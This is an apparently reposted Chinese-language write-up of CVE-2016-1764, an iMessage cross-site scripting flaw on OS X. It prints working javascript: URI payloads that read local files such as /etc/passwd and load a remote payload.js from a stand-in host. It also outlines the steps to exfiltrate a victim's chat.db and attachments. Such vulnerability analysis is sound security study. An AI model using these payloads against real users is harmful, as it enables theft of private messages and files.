百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术教程 > 正文

苹果OSX Message跨域脚本攻击漏洞详解(

csdh11 2025-03-28 15:56 7 浏览

苹果在3月修复的CVE-2016-1764(CNNVD-201603-347),是一个应用层漏洞,可导致远程攻击者借助iMessage客户端泄露所有的消息内容和附件。

对比攻击iMessage协议,这是一个相对简单的漏洞。攻击者不需要具备扎实的数学基础,也不需要精通内存管理、shellcode和ROP链,只需要对JavaScript有基本的了解。

iMessage使用WebKit的嵌入式版本实现用户接口,另外,其中显示的URI都是可点击的HTML 链接。攻击者可以创建简单的JavaScript URI(例如javascript:),在应用程序DOM中执行攻击者提供的代码(跨站脚本)。

尽管iMessage使用的嵌入式WebKit库在applewebdata://源中执行,但是由于缺少同源策略,攻击者仍可以通过向file://URI发送XMLHttpRequest(XHR) GET请求读取任意文件。攻击者不仅可以非法使用XHR读取文件,而且一旦受害者接入网络,攻击者便可以向远程服务器上传受害者的聊天历史和附件。

只要用户点击URL,攻击便会成功。另外,如果受害者启用了短信转发功能,攻击者便可以恢复经由受害者iPhone的任何信息。

技术细节

iMessage

iMessage的用户接口主要由嵌入式的WebKit决定。当用户收发信息时,HTML中会被插入DOM,用于渲染UI及其附件/多媒体内容。使用该应用发送的所有消息都在DOM中渲染,因此,通用的客户端Web漏洞可以影响iMessage应用。

研究人员测试iMessage时发现,所有的协议方案都会自动转换成链接,并插入DOM中。以下URI示例就是作为链接插入到WebView中:

test://test

smb://test@test.com

file:///etc

anyurihandler://anycontentafter

由于iMessage没有设置可用协议的白名单,因此攻击者可以向受害者发送包含javascript://的消息,其中的javascript://会在受害者的计算机上转换成链接。

一旦用户点击该链接,嵌入式的WebKit会在当前源中执行攻击者提供的JavaScript,如下:

注意其中的%0a(\n)是为了避开JavaScript注释//,该代码会被解析为下列内容:

//bishopfox.com/research?

prompt(1)

点击链接后,会触发iMessage中的JavaScript提示:

然而iMessage是一个应用程序,并不是网站,因此JavaScript会在applewebdata://origin域中执行:

由于攻击者的代码在完整的WebKit实现中执行,XMLHttpRequest便会在运行时可用。嵌入式WebKit和Web浏览器最显著的差别就是,WebKit不会实现任何的同源策略(因为它是一个应用程序)。攻击者可以利用这一点向file://URI发送XMLHttpRequest GET请求,在不违反同源策略的情况下读取本地文件系统中的文件,实现这一过程唯一的要求就是不能使用相对路径,攻击者必须知道文件的完整路径。

读取文件

iMessage的DOM可以执行下列代码,读取/etc/passwd文件:

function reqListener

{ prompt(this.responseText);

// send back to attacker’s server here

}

var oReq = new XMLHttpRequest;

oReq.addEventListener("load", reqListener);

oReq.open("GET", "file:///etc/passwd");

oReq.send;

该代码转换成URI负载后,显示如下:

javascript://bishopfox.com/research?%0d%0afunction%20reqListener%20%20%7B%0A%20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%20new%20XMLHttpRequest%3B%0AoReq.addEventListener(%22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send%3B

当在iMessage中点击该链接时,会出现如下提示:

但是,上述链接过长,可能会引起怀疑,我们可以通过从其他域动态加载JavaScript并存放在DOM中来缩短该链接。如下,将http://example.com/1.js域的JavaScript注入到DOM中:

javascript://bishopfox.com/research?%0a%28function%28s%29%7Bs.src%3D%27http%3A%2f%2fexample.com%2f1.js%27%3Bdocument.body.appendChild%28s%29%7D%29%28document.createElement%28%27script%27%29%29

其中引用的JavaScript文件中可以包含任意长度的JavaScript指令。

由于苹果使用应用程序沙箱机制,该文件只有存放在~/Library/Messages/*目录和一些非用户系统目录(如/etc/)下才可以访问。

获取iMessage数据库和附件

iMessage收到的消息和附件存放在如下目录中:

/Users//Library/Messages/*

这些消息的文本内容和其他元数据存放在SQLite数据库中,目录如下:

/Users//Library/Messages/chat.db

该数据库中也包括用户设备上所有附件的位置信息。为了获取该数据库,需要更加高级的攻击负载。

漏洞利用

攻击者可通过执行以下步骤成功删除数据:

1、获取DOM中的JavaScript初始执行权限

2、获取当前用户名

3、使用用户名生成完整路径:
/Users/ExampleUser/Library/Messages/chat.db\

4、发送XMLHttpRequest请求读取数据库文件,查询附件文件的路径

5、使用XMLHttpRequest请求向远程服务器上传数据库和所有附件

我们可以通过请求并解析
/Library/Preferences/com.apple.loginwindow.plist文件获取当前用户,该文件在OSX应用程序沙箱中是可读的,因此可以很简单地构建用户chat.db文件的完整路径。

获取数据库文件后,我们可以借助自定义的服务器端脚本提权附件的完整路径,至此,附件的完整路径被恶意的JavaScript负载恢复,并用于提取受害者设备中的附件。

攻击者还可以对链接做以下改善:

javascript://www.facebook.com/photo.php?fbid=111789595853599&set=a.111055039260388.1073741826.100010676767694&type=3&theater%0A%28function%28s%29%7Bs.src%3D%27http%3A%2f%2fyourhostname%3A8888%2ff%2fpayload.js%27%3Bdocument.body.appendChild%28s%29%7D%29%28document.createElement%28%27script%27%29%29

一旦用户点击该链接,那么用户所有的聊天历史和相关附件都会转移给攻击者。想要进一步了解攻击情况,可以下载其利用代码。

JavaScript无处不在

随着黑客技术的提高,客户端内容注入漏洞不再局限于浏览器。虽然WebKit或更加危险的nw.js确实可以帮助开发者构建桌面应用程序,却很可能影响应用程序的安全性。众所周知,嵌入式Web框架很容易存在跨站脚本等常见漏洞,甚至可能面临更具破坏性的攻击。

该漏洞还体现了URI的强大力量。对于初学者,URI只是一个网站的链接,但是它也可能是更加复杂的生态系统的变体。就像邮件的附件,除非用户确信来源安全,否则永远不会点击。

相关推荐

探索Java项目中日志系统最佳实践:从入门到精通

探索Java项目中日志系统最佳实践:从入门到精通在现代软件开发中,日志系统如同一位默默无闻却至关重要的管家,它记录了程序运行中的各种事件,为我们排查问题、监控性能和优化系统提供了宝贵的依据。在Java...

用了这么多年的java日志框架,你真的弄懂了吗?

在项目开发过程中,有一个必不可少的环节就是记录日志,相信只要是个程序员都用过,可是咱们自问下,用了这么多年的日志框架,你确定自己真弄懂了日志框架的来龙去脉嘛?下面笔者就详细聊聊java中常用日志框架的...

物理老师教你学Java语言(中篇)(物理专业学编程)

第四章物质的基本结构——类与对象...

一文搞定!Spring Boot3 定时任务操作全攻略

各位互联网大厂的后端开发小伙伴们,在使用SpringBoot3开发项目时,你是否遇到过定时任务实现的难题呢?比如任务调度时间不准确,代码报错却找不到方向,是不是特别头疼?如今,随着互联网业务规模...

你还不懂java的日志系统吗 ?(java的日志类)

一、背景在java的开发中,使用最多也绕不过去的一个话题就是日志,在程序中除了业务代码外,使用最多的就是打印日志。经常听到的这样一句话就是“打个日志调试下”,没错在日常的开发、调试过程中打印日志是常干...

谈谈枚举的新用法--java(java枚举的作用与好处)

问题的由来前段时间改游戏buff功能,干了一件愚蠢的事情,那就是把枚举和运算集合在一起,然后运行一段时间后buff就出现各种问题,我当时懵逼了!事情是这样的,做过游戏的都知道,buff,需要分类型,且...

你还不懂java的日志系统吗(javaw 日志)

一、背景在java的开发中,使用最多也绕不过去的一个话题就是日志,在程序中除了业务代码外,使用最多的就是打印日志。经常听到的这样一句话就是“打个日志调试下”,没错在日常的开发、调试过程中打印日志是常干...

Java 8之后的那些新特性(三):Java System Logger

去年12月份log4j日志框架的一个漏洞,给Java整个行业造成了非常大的影响。这个事情也顺带把log4j这个日志框架推到了争议的最前线。在Java领域,log4j可能相对比较流行。而在log4j之外...

Java开发中的日志管理:让程序“开口说话”

Java开发中的日志管理:让程序“开口说话”日志是程序员的朋友,也是程序的“嘴巴”。它能让程序在运行过程中“开口说话”,告诉我们它的状态、行为以及遇到的问题。在Java开发中,良好的日志管理不仅能帮助...

吊打面试官(十二)--Java语言中ArrayList类一文全掌握

导读...

OS X 效率启动器 Alfred 详解与使用技巧

问:为什么要在Mac上使用效率启动器类应用?答:在非特殊专业用户的环境下,(每天)用户一般可以在系统中进行上百次操作,可以是点击,也可以是拖拽,但这些只是过程,而我们的真正目的是想获得结果,也就是...

Java中 高级的异常处理(java中异常处理的两种方式)

介绍异常处理是软件开发的一个关键方面,尤其是在Java中,这种语言以其稳健性和平台独立性而闻名。正确的异常处理不仅可以防止应用程序崩溃,还有助于调试并向用户提供有意义的反馈。...

【性能调优】全方位教你定位慢SQL,方法介绍下!

1.使用数据库自带工具...

全面了解mysql锁机制(InnoDB)与问题排查

MySQL/InnoDB的加锁,一直是一个常见的话题。例如,数据库如果有高并发请求,如何保证数据完整性?产生死锁问题如何排查并解决?下面是不同锁等级的区别表级锁:开销小,加锁快;不会出现死锁;锁定粒度...

看懂这篇文章,你就懂了数据库死锁产生的场景和解决方法

一、什么是死锁加锁(Locking)是数据库在并发访问时保证数据一致性和完整性的主要机制。任何事务都需要获得相应对象上的锁才能访问数据,读取数据的事务通常只需要获得读锁(共享锁),修改数据的事务需要获...